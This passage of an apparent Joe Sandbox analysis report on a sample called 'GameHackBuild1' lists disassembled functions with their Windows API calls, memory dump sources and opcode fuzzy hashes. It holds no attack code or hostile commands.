                                      • GetLastError.KERNEL32 ref: 00A09BCD
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                       • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: ErrorFileLastPointer
                                      • String ID:
                                      • API String ID: 2976181284-0
                                      • Opcode ID: b692da39d34d8f36c60c751237baa59f33237e2b846b38a8cbfa9b7a9d0e72c0
                                      • Instruction ID: 51081392337a917c0245bc5f5a5d4ba6c54ecedd6354fa48e1a3e4104f008153
                                      • Opcode Fuzzy Hash: b692da39d34d8f36c60c751237baa59f33237e2b846b38a8cbfa9b7a9d0e72c0
                                      • Instruction Fuzzy Hash: F401C43230921D9BCB08CF65BD949BFB3A9AFC6731B14852DF916872D2DA31D8059A21
                                      APIs
                                      • SetFilePointer.KERNELBASE(?,00000000,00000000,00000001), ref: 00A09E76
                                      • GetLastError.KERNEL32 ref: 00A09E82
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                       • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: ErrorFileLastPointer
                                      • String ID:
                                      • API String ID: 2976181284-0
                                      • Opcode ID: 445cfb6c3a4626f1c116fdd05bc34aff2029b565753bd578b96e986882121fbd
                                      • Instruction ID: 7cc91a3dd100ae3f23e1fa2914ad97bc10fa014ca07f0fa84aee11db3aa3dda2
                                      • Opcode Fuzzy Hash: 445cfb6c3a4626f1c116fdd05bc34aff2029b565753bd578b96e986882121fbd
                                      • Instruction Fuzzy Hash: B901B1723043085BEB34DF69ED44B6BB7D99B89318F14493EB146C36D1DA35EC488610
                                      APIs
                                      • _free.LIBCMT ref: 00A28627
                                        • Part of subcall function 00A28518: RtlAllocateHeap.NTDLL(00000000,?,?,?,00A23A26,?,0000015D,?,?,?,?,00A24F02,000000FF,00000000,?,?), ref: 00A2854A
                                      • HeapReAlloc.KERNEL32(00000000,?,?,?,?,00A40F50,00A0CE57,?,?,?,?,?,?), ref: 00A28663
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                       • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: Heap$AllocAllocate_free
                                      • String ID:
                                      • API String ID: 2447670028-0
                                      • Opcode ID: 9ca28524c0846f0d3848a6d8be4e9dff3b81e631ab4e19b1bf5a09f76598b2ac
                                      • Instruction ID: d162a57f34e01be65d9722543fb5c62405149a8ee4ab9a97b030edd26098ef27
                                      • Opcode Fuzzy Hash: 9ca28524c0846f0d3848a6d8be4e9dff3b81e631ab4e19b1bf5a09f76598b2ac
                                      • Instruction Fuzzy Hash: 1FF062321071356ADB312B6DBD00F6F6B689F91BB1F248135F81496591EF2CC90195A5
                                      APIs
                                      • GetCurrentProcess.KERNEL32(?,?), ref: 00A10915
                                      • GetProcessAffinityMask.KERNEL32(00000000), ref: 00A1091C
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                       • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: Process$AffinityCurrentMask
                                      • String ID:
                                      • API String ID: 1231390398-0
                                      • Opcode ID: 4e6dafe33faba6ea6bdae204db22448c43c3afd9cb697336e26e3f754753e30e
                                      • Instruction ID: 4bfdde910eed03b0f659baf64f53adc2ee80fd3bf6d412960b4af03f4730ec80
                                      • Opcode Fuzzy Hash: 4e6dafe33faba6ea6bdae204db22448c43c3afd9cb697336e26e3f754753e30e
                                      • Instruction Fuzzy Hash: ECE09233A14109AB6F09CBB49C14CFB73ADEB052107204179B807D7201F970DEC186A4
                                      APIs
                                      • SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00A0A27A,?,?,?,00A0A113,?,00000001,00000000,?,?), ref: 00A0A458
                                      • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00A0A27A,?,?,?,00A0A113,?,00000001,00000000,?,?), ref: 00A0A489
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                       • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: AttributesFile
                                      • String ID:
                                      • API String ID: 3188754299-0
                                      • Opcode ID: c0a944d2999a3eb6eb22c2c4501f275ead79096c1f10b5d3cdc5274ce26b2cc2
                                      • Instruction ID: b4951cf3841726aa4705f8cb16c09a5fc5b5e36e79c0b5e2838ef4c007fcdba7
                                      • Opcode Fuzzy Hash: c0a944d2999a3eb6eb22c2c4501f275ead79096c1f10b5d3cdc5274ce26b2cc2
                                      • Instruction Fuzzy Hash: 20F0A03524520D7BEF019F60EC45FD9776CBB04382F04C051BC88861A1DB728AA9AA50
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                       • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: ItemText_swprintf
                                      • String ID:
                                      • API String ID: 3011073432-0
                                      • Opcode ID: a627c41a30b1fe09790c90cf25cae69158a51a19e7ec1a1fc3978c3ac1181282
                                      • Instruction ID: 63d9db9a65ee2572177c6765f1257c2aec3406888f5dbee2b4d72a1cbff3c1ac
                                      • Opcode Fuzzy Hash: a627c41a30b1fe09790c90cf25cae69158a51a19e7ec1a1fc3978c3ac1181282
                                      • Instruction Fuzzy Hash: D8F05C7250034C3ADB11EFF0AC02FDD372DAB05345F000541B700630E2D9766A904761
                                      APIs
                                      • DeleteFileW.KERNELBASE(?,?,?,00A0984C,?,?,00A09688,?,?,?,?,00A31FA1,000000FF), ref: 00A0A13E
                                      • DeleteFileW.KERNEL32(?,?,?,00000800,?,?,00A0984C,?,?,00A09688,?,?,?,?,00A31FA1,000000FF), ref: 00A0A16C
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                       • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: DeleteFile
                                      • String ID:
                                      • API String ID: 4033686569-0
                                      • Opcode ID: e9244fe61b6cffa51f356e87d2c210a8dc4b6b7a48a67fb53aa0f1d430236f0e
                                      • Instruction ID: b3976234d5277b83adf5d0eb314edaa5d1a37aeecf114238a62a59922497ca5d
                                      • Opcode Fuzzy Hash: e9244fe61b6cffa51f356e87d2c210a8dc4b6b7a48a67fb53aa0f1d430236f0e
                                      • Instruction Fuzzy Hash: F7E0923564020C6BDB119F60EC81FE9776CAB09382F484065BC88C70A0DB729ED5AAA0
                                      APIs
                                      • GdiplusShutdown.GDIPLUS(?,?,?,?,00A31FA1,000000FF), ref: 00A1A3D1
                                      • CoUninitialize.COMBASE(?,?,?,?,00A31FA1,000000FF), ref: 00A1A3D6
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                       • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: GdiplusShutdownUninitialize
                                      • String ID:
                                      • API String ID: 3856339756-0
                                      • Opcode ID: e756f64e0b1789334938069cccd33378c30585872853de33e3c96f5b31511fc0
                                      • Instruction ID: e985f91eeba5347b6c6af85c320a3f0192371e62a3cb9fa23ba4449ff6b935f1
                                      • Opcode Fuzzy Hash: e756f64e0b1789334938069cccd33378c30585872853de33e3c96f5b31511fc0
                                      • Instruction Fuzzy Hash: D2F06536618654EFC711EB8DDD05B59FBACFB89B20F04436AF41983760CB796801CB91
                                      APIs
                                      • GetFileAttributesW.KERNELBASE(?,?,?,00A0A189,?,00A076B2,?,?,?,?), ref: 00A0A1A5
                                      • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,00A0A189,?,00A076B2,?,?,?,?), ref: 00A0A1D1
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                       • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: AttributesFile
                                      • String ID:
                                      • API String ID: 3188754299-0
                                      • Opcode ID: a79c3d6cefd96520125fc3ec4687be2c4ead6d32e30b6d788d6d27c0ad8ec870
                                      • Instruction ID: 0cb391f45c13212c08921975480d2407f5716635d84a655a9bec92ef5246d309
                                      • Opcode Fuzzy Hash: a79c3d6cefd96520125fc3ec4687be2c4ead6d32e30b6d788d6d27c0ad8ec870
                                      • Instruction Fuzzy Hash: F6E0923650412C5BDB20EBA8EC05BD9B76CEB193E1F0042A1FD54E32D0D7719E889AE0
                                      APIs
                                      • GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00A100A0
                                      • LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00A0EB86,Crypt32.dll,00000000,00A0EC0A,?,?,00A0EBEC,?,?,?), ref: 00A100C2
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                       • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: DirectoryLibraryLoadSystem
                                      • String ID:
                                      • API String ID: 1175261203-0
                                      • Opcode ID: 28f483cb892716de1aa53c2dbbef7820443853471ac353f836d0697d3de096fd
                                      • Instruction ID: fd53295b228298318e5133aec13cdd2f7f57f17375b3252eba0e3c4c86214460
                                      • Opcode Fuzzy Hash: 28f483cb892716de1aa53c2dbbef7820443853471ac353f836d0697d3de096fd
                                      • Instruction Fuzzy Hash: 7FE0127691511C6ADB21DBA4AD05FD6776CEF0D3D2F0400A5B948D3144DA749A848BB0
                                      APIs
                                      • GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00A19B30
                                      • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 00A19B37
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                       • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: BitmapCreateFromGdipStream
                                      • String ID:
                                      • API String ID: 1918208029-0
                                      • Opcode ID: cc69bf926306d5ea78991c47b83e4fddf463c6d41561619a8bcf7556723f77ca
                                      • Instruction ID: 6ae6590c7325384e959b9a753b51cd75cb8670911b71b845ca9e5a8c0e2e3ed5
                                      • Opcode Fuzzy Hash: cc69bf926306d5ea78991c47b83e4fddf463c6d41561619a8bcf7556723f77ca
                                      • Instruction Fuzzy Hash: BDE0ED71905218EBCB10DF99D5016DAB7FCEB09721F10805BEC9593200D771AE44DB95
                                      APIs
                                        • Part of subcall function 00A2329A: try_get_function.LIBVCRUNTIME ref: 00A232AF
                                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00A2217A
                                      • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00A22185
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                       • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: Value___vcrt____vcrt_uninitialize_ptdtry_get_function
                                      • String ID:
                                      • API String ID: 806969131-0
                                      • Opcode ID: 9890e11b73e963c6270ea6b8fbaecfae397822bcc76e76a92b908fef513974e6
                                      • Instruction ID: b56460a8177038bde09c491b7b9cbb9cd58000526d6ce81b948839eaced45176
                                      • Opcode Fuzzy Hash: 9890e11b73e963c6270ea6b8fbaecfae397822bcc76e76a92b908fef513974e6
                                      • Instruction Fuzzy Hash: FBD0A936608372343D08A7BC3E43FA823646862BB43F00B76F7208A0E1EF1481216312
                                      APIs
                                      • DloadLock.DELAYIMP ref: 00A1DC73
                                      • DloadProtectSection.DELAYIMP ref: 00A1DC8F
                                        • Part of subcall function 00A1DE67: DloadObtainSection.DELAYIMP ref: 00A1DE77
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                       • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: Dload$Section$LockObtainProtect
                                      • String ID:
                                      • API String ID: 731663317-0
                                      • Opcode ID: e28f39b0a1eb8bb9c0b46218c38ee9c77dd4a92407240c3467f4ddc0f33ca903
                                      • Instruction ID: 59d1157c036534041a7e93c8f8a82e476e1d2309d1e1b08a787f85e38fee7dbf
                                      • Opcode Fuzzy Hash: e28f39b0a1eb8bb9c0b46218c38ee9c77dd4a92407240c3467f4ddc0f33ca903
                                      • Instruction Fuzzy Hash: BDD012745402015EC715EBB49E46BDD3371B704744FA40A05F105C70A0DFF458C2C645
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                       • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: ItemShowWindow
                                      • String ID:
                                      • API String ID: 3351165006-0
                                      • Opcode ID: 84b5016c48c8f60ee9b3c103c27de8e4a7233582ccffa20002621144fd724336
                                      • Instruction ID: 6e86f7dbc1882c7d0e13873d9128d433185ea3240b822aeb1a9a19eacebedcac
                                      • Opcode Fuzzy Hash: 84b5016c48c8f60ee9b3c103c27de8e4a7233582ccffa20002621144fd724336
                                      • Instruction Fuzzy Hash: 24C0123205C600BFCB018BB0DC09E2FBBB8ABA6212F05CA08F2A5C0060C238C010DB11
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                       • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: H_prolog
                                      • String ID:
                                      • API String ID: 3519838083-0
                                      • Opcode ID: 2b1938a9292511d8463889ce930c26921b249c5f72a6a72449c61065b95db6a5
                                      • Instruction ID: 09071069a4f9ac27c181f667397d7505f5f68d2549a11b7adce8d45213503bd3
                                      • Opcode Fuzzy Hash: 2b1938a9292511d8463889ce930c26921b249c5f72a6a72449c61065b95db6a5
                                      • Instruction Fuzzy Hash: C1C1B130A042489FEF15CFA8D894BE97BE5EF1A314F0844B9EC46DB2C6CB759944CB61
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                       • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: H_prolog
                                      • String ID:
                                      • API String ID: 3519838083-0
                                      • Opcode ID: ca5648fef2b8ec46c6c9c7d906f396526f110ebd56ab31e480fa9bea4441141c
                                      • Instruction ID: 1d056761386810e30c66f2dbdd6ed4b3a6cc9d7e6c124aafd18adef919c09b92
                                      • Opcode Fuzzy Hash: ca5648fef2b8ec46c6c9c7d906f396526f110ebd56ab31e480fa9bea4441141c
                                      • Instruction Fuzzy Hash: 6F71AE72504F48AEDF25DB30DD51AE7B7E8AF14301F444D6EE5AB87182DA316A48DF10
                                      APIs
                                      • __EH_prolog.LIBCMT ref: 00A08384
                                        • Part of subcall function 00A01380: __EH_prolog.LIBCMT ref: 00A01385
                                        • Part of subcall function 00A01380: new.LIBCMT ref: 00A013FE
                                        • Part of subcall function 00A019A6: __EH_prolog.LIBCMT ref: 00A019AB
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                       • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: H_prolog
                                      • String ID:
                                      • API String ID: 3519838083-0
                                      • Opcode ID: 374d68acb7a64be883447aa92d146da405ed0d7c026174f2fd5f56ce14f93564
                                      • Instruction ID: 262b34e92be7fb9eb16ad6b900ff925b437ef759b8c421f71ece74ab21c4fcc5
                                      • Opcode Fuzzy Hash: 374d68acb7a64be883447aa92d146da405ed0d7c026174f2fd5f56ce14f93564
                                      • Instruction Fuzzy Hash: BA41C33184065C9ADF20DB60ED55BEA73B8AF50310F0440EAE58AA70D3DF795EC8DB54
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                       • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: H_prolog
                                      • String ID:
                                      • API String ID: 3519838083-0
                                      • Opcode ID: d4fdf9156f9b882d9adeff7a68a05321b3815a73d830f9a0576bff0393ec6cd2
                                      • Instruction ID: d2dc5953ee29f03ad54ff90482c65888000db43d516bb59add777f4b75bf7d7f
                                      • Opcode Fuzzy Hash: d4fdf9156f9b882d9adeff7a68a05321b3815a73d830f9a0576bff0393ec6cd2
                                      • Instruction Fuzzy Hash: C021E6B1E40216AFDB14DF64DD45BAB766CFB04314F04063AE919DB681E770D99087A8
                                      APIs
                                      • __EH_prolog.LIBCMT ref: 00A01E05
                                        • Part of subcall function 00A03B3D: __EH_prolog.LIBCMT ref: 00A03B42
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
